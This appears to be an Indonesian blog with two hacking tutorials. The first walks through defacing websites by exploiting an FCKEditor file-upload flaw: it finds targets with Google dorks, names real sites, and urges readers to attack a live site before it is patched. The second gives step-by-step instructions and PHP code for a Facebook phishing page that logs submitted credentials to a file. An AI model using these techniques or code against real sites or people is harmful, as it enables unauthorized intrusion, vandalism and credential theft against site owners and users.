Selasa, 21 Agustus 2012

PEMBUATAN FILE UNTUK DEFACE

Yang pertama harus kita lakukan adalah pembuatan file untuk deface, dibikin seindah mungkin.
BinusHacker Team, akan membuat halaman deface dengan extention .txt, bisa juga dengan file .html, .php, .asp, .shtml, dsb. Tergantung dari kemauan saja.
BinusHacker Team akan membuat halaman deface dengan kata-kata berikut:
BinusHacker Team Was Here
Tutorial Deface By BinusHacker Team – To All BinusHacker Family
*Remember: It’s Just For Educational Purpose!
Ingat! Dengan mendeface tidak akan menjadikan anda hebat :)
Special thanks for www.binushacker.net
Buka notepad, dan kemudian paste kata-kata diatas. Note: Kata-kata bisa sesuka hati sang defacer, tergantung mood :)
Langsung seperti gambar berikut:
Setelah selesai membuat dan merangkai kata yang indah, simpanlah file tersebut, sebagai contoh seperti gambar berikut:
BinusHacker menamakan file defacenya dengan nama: “defaced.txt“, nanti file ini yang akan di upload ke situs target.
Pembuatan halaman deface sudah selesai, lanjut ke step selanjutnya.
PENCARIAN & MENGUMPULKAN INFORMASI KELEMAHAN WEBSITE
Yang harus kita lakukan adalah cari tombol “SEARCH” di website www.exploit-db.com, kemudian klik. Masukkan keyword pencarian “File Upload” sesuai dengan data, contoh di gambar berikut:
Dari hasil search akan muncul banyak pilihan informasi-informasi kelemahan. Semua informasi ini bisa berguna untuk deface dengan cara “File Upload“, hasilnya seperti gambar dibawah:
Dari sekian banyak kelemahan, ambil salah satu kelemahan misalkan “FCKEditor All Version Arbitary Vulnerability“.
Klik informasi kelemahan tersebut, maka akan muncul petunjuk cara penggunaannya, seperti gambar dibawah:
Nah, kita sudah mendapatkan infromasi kelemahan. Maka selanjutnya kita harus mencari website target!
PENCARIAN WEBSITE TARGET DI SEARCH ENGINE
Kita cari website target yang akan dideface di mesin pencari, bisa menggunakan BING, YAHOO, BAIDU, ALLTHEWEB, GOOGLE. Kali ini yang paling mudah saja, gunakan ‘GOOGLE‘!
Bukan google search engine, kemudian masukkan kata kuncinya. Kata kunci didapatkan dari informasi kelemahan yang sebelumnya kita dapatkan, yaitu: “/editor/filemanager/” , kita masukkan kata kunci tersebut.
Cara memasukkanya dengan menggunakan fungsi INURL & SITE. INURL artinya pencarian dilakukan kepada setiap website yang di URL Addressnya mengandung kata “/editor/filemanager/“. SITE artinya pencarian dilakukan kepada domain TLD tertentu, disini kita mencari domain yang akhirannya .COM. Sehingga keywordnya menjadi: inurl: /editor/filemanager/ site: com
Dari hasil pencarian tersebut akan muncul beberapa tampilan website seperti berikut:
Dari hasil tersebut kita sudah mendapatkan informasi website target yaitu: http://www.madhouse1.com
Dengan informasi Situs Target URL lengkapnya: http://www.madhouse1.com/clients/dna/cms/HTMLEditor/
EKSEKUSI UPLOAD FILE UNTUK DEFACE
Oke, dari informasi kelemahan yang sebelumnya kita dapatkan, bahwa kelemahan terdapat di /editor/filemanager/connectors/uploadtest.html
http://www.madhouse1.com/clients/dna/cms/HTMLEditor/ <- Merupakan target dasar yang didapatkan dari google dan belum ditambahkan dengan url untuk file upload.
/editor/filemanager/connectors/uploadtest.html <- Sebagai tambahan di link yang memiliki kelemahan dan digunakan untuk file upload.
Kita gabungkan & masukkan URL webtarget tersebut sehingga menjadi: http://www.madhouse1.com/clients/dna/cms/HTMLEditor/editor/filemanager/connectors/uploadtest.html
Untuk lebih jelas lihat gambar berikut:
Dari sana, kita pilih “Select the File Uploader” dengan “PHP“, dan “To User Resource Type” defaultnya “None” saja.
Lebih jelasnya seperti gambar berikut:
Kemudian pada “Upload New File“, klik “Browse“, nanti akan muncul folder pencarian, dimana akan meminta file untuk di Upload. Carilah file deface yang telah dibuat sebelumnya. Karena sebelumnya sudah disave dengan nama “defaced.txt“, maka kita cari file tersebut untuk di upload. Lihat gambar berikut:
Setelah file terupload, langsung saja klik “Send It To The Server“, proses akan berjalan, nanti akan muncul informasi seperti gambar dibawah:
Jika ada tulisan “File Uploaded With No Errors“, maka anda telah sukses melakukan upload file deface, jika tidak berarti anda gagal.
Informasi terakhir dari halaman deface adalah seperti ini:
Disana akan muncul informasi hasil atau tempat file terupload yaitu /PowerCMS folder/file/defaced.txt
Karena url berada di sana, maka URL hasil deface upload akan berada disini
Domain URL: http://www.madhouse1.com/
Hasil Upload URL: /PowerCMS folder/file/defaced.txt
Gabungkan hasil dari file upload menjadi: http://www.madhouse1.com/PowerCMS folder/file/defaced.txt
Nanti hasilnya akan seperti ini:
Selamat anda sudah berhasil mendeface, sekarang tinggal di upload ke www.zone-h.org / www.indonesiandefacer.org :)
Cara-cara di atas juga bisa diterapkan di berbagai vulnerability file upload, tinggal ikuti saja aturan main sesuai dengan vulnerability yang ditemukan.
Sebagai latihan, langsung saja menggunakan live target berikut, gunakan sebelum di PATCH!
1. http://www.royzband.com/cms/HTMLEditor/
Berikut adalah tampilan deface BinusHacker di royzband.com
Terima kasih.. Semoga sukses dan semoga berhasil :)

Jumat, 03 Agustus 2012

Cara Membuat Web Phising

 |Topik Cara Membuat Web Phising kalau di bawakan pada jaman sekarang hampir sama dengan Jebakan Batman.. Cara membuat Web Phising Facebook. Yups postingan kali inisaya akan membahas tentang cara membuat web phising. walau pun ini sudah berita lama yang banyak orang sudah mengetahuinya. Tapi saya yakin masih banyak yang membuatuhkan pengetahuan tentang cara membuat web phising seperti yang anda baca sekarang ini. Apakah anda sudah tau apa itu web phising ?? web phisng = web + phising Web  menurut saya adalah sebuah page yang berisi content yang di isi oleh admin. ( menurut saya ) lebih lengkapnyakesini. Phising menurut dari yang saya baca phising  berasal dari kata fishing atau di bahasa indonesia kan yang memiliki arti memancing. Memancing ? ternyata memang benar kita membuat web untuk memancing korban untuk masuk dalam web phising yang telah kita buat. Cara buatnya gimana ? Baik saya akan kasih tahu cara membuat web phising. Langkah – langkahnya sebagai berikut :

phishing facebook Cara Membuat Web Phising
  1. Cari dan buka alamat yang mau di jadiin hompage / halaman utama web phising anda. misal http://facebook.com.
  2. Setelah halaman terbuka sepenuhnya anda tekal tombol Ctrl + U di keyboard secara bersamaan. Kemudian akan muncul Source Code-nya.
  3. Copy semua Source Code yang terdapat di web tersebut. Ctrl + A ( untuk blok all ) kemudian Crtl + C ( untuk meng-copy / menyaslin Source Code tersebut ).
  4. Setelah itu buka notepad/wordpad ( Start – all program – accessories- Notepad/Wordpad)  di windows atau gedit ( Applications –  Accessories – Gedit Text Editor ) di linux ( yang pake gedit ).
  5. Paste Source Code yang sudah di copy tadi. seperti langkah nomor 3.
  6. Cari menggunakan Crtl + F, isi dengan “action=” ( tanpa tanda petik )
  7. Ketemu
    1<form action="URL WEB ASLI" method="post">
  8. Ganti URL WEB ASLI dengan phising.php ( phising.php hanya perumpamaan, bisa anda ganti namun harus semua dengan kata phising.php nantinya di ganti dengan nama.phpanda ).
  9. Ubah “post” menjadi “GET“.
  10. Save as ( file – save as ) atau tekan Ctrl + S. ( ingat file harus di ubah menjadi html )
  11. Buka notepad lagi ( langkah sama seperti nomor 4 ).
  12. copas code php ini ke notepad :
    1<?php header("Location: http://URL WEB ASLI"); $handle = fopen("passwords.txt""a"); foreach($_GET as $variable => $value) { fwrite($handle, $variable); fwrite($handle, "="); fwrite($handle, $value); fwrite($handle, "\r\n"); } fwrite($handle, "\r\n"); fclose($handle); exit; ?>
  13. Ganti http://URL WEB ASLI dengan http://facebook.com misal.
  14. Save dengan nama phising dan extensi .php jadinya phising.php
  15. Upload ke hostingan anda. Baca disini untuk Cara Upload File di Free Hosting 000webhost.
  16. Jangan lupa permission di atur 777 untuk file passwords.txt
  17. Selesai
Anda telah selesai membuat web phising kalo anda masih bingung jangan malu bertanya. Tuliskan di kotak komentar di bawah ini.